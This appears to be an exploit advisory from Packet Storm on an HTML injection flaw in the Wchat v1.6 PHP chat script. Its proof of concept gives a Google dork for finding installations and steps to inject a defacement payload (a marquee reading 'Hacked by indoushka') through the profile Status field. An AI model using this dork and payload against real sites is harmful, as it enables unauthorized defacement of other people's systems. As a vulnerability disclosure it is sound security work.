Wchat version 1.6 suffers from an html injection vulnerability.
dffb169faabebbf6fccf31499cc633ea4880252098faa57d693016c050f3052d====================================================================================================================================
| # Title : Wchat v1.6 - Fully Responsive PHP AJAX Chat Script Html code inject Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : https://www.codelist.cc/scripts/235860-wchat-v16-fully-responsive-php-ajax-chat-script-nulled.html |
| # Dork : Wchat - Admin Login |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] Create your account and go to "Edit profile" https://127.0.0.1/products/wchat-php-script/edit_profile.php
[+] in Status Put your code
[+] arbitrary html C0D3 : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
[+] https://127.0.0.1/products/wchat-php-script/login.php
Greetings to :===================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg|
=================================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed